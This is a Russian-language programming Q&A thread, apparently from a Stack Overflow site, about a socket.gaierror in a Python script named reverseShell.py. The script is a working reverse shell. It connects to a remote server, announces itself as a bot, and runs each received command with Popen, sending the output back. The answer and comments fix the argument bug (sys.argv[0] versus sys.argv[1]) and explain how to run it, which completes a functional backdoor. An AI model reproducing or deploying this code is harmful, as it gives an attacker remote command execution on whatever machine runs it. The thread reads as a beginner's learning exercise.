# Код на python не работает проблема с socket.gaierror

Tags: python, сокет, kali-linux

При запуске этого кода:

```
import sys 
from subprocess import Popen, PIPE
from socket import *
serverName = sys.argv[0]
serverPort = 8000 
# Создать IPv4(AF_INET), TCP-сокет (Sock_Stream)
clientSocket = socket(AF_INET, SOCK_STREAM) 
clientSocket.connect((serverName , serverPort))
clientSocket.send('Bot reporting for duty'.encode()) 
command = clientSocket.recv(4064).decode()
while command != "exit" :
     proc = Popen(command.split(" "), stdout=PIPE, stderr=PIPE)
     result, err = proc.communicate()
     clientSocket.send(result) 
     command = (clientSocket.recv(4064)).decode()

clientSocket.close()
```

На 8 строке выдает ошибку:

```
 File "/home/kali/Desktop/9876/reverseShell.py", line 8, in <module>
    clientSocket.connect((serverName , serverPort))
socket.gaierror: [Errno -2] Name or service not known
```

Ошибок в коде вроде нету, найти ответ не смог, ума не приложу, что не так.

Comment: Просто переведите текст ошибки: `Name or service not known`

Answer (score 1):

В `sys.argv[0]` путь до текущего файла, т.е. у вас там будет `/home/kali/Desktop/9876/reverseShell.py`

Думаю, вы передаете имя в аргументе, поэтому должно быть так:

```
serverName = sys.argv[1]
...
```

Comment: Выдает новую ошибку  serverName = sys.argv[1]
IndexError: list index out of range

Comment: Значит, вы при запуске не передаете аргумент, что-то типа `reverseShell.py localhost`, тогда в serverName будет строка "localhost"

Comment: Не совсем понял куда нужен localhost заранее извиняюсь за тупость

Comment: @Quqaw123, смотрите, переменная `sys.argv` содержит аргументы программы при ее запуске. Это список. У этого списка всегда первым элементом будет путь до программы. У вас в коде было `serverName = sys.argv[0]` и `clientSocket.connect((serverName , serverPort))`, а т.к. первый элемент это путь до программы, то в `serverName` оказалось `/home/kali/Desktop/9876/reverseShell.py`, что не является валидным именем сервера. Я предположил, что в вашей программе опечатка и имя сервера передается в аргументах при запуске программы, тогда это должно быть `serverName = sys.argv[1]`

Comment: @Quqaw123, нужно из консоли запускать, что-то типа `python reverseShell.py localhost`, тогда имя сервера попадет в переменную. Подробнее про запуск питона на линуксе: https://stackoverflow.com/q/13933169/5909792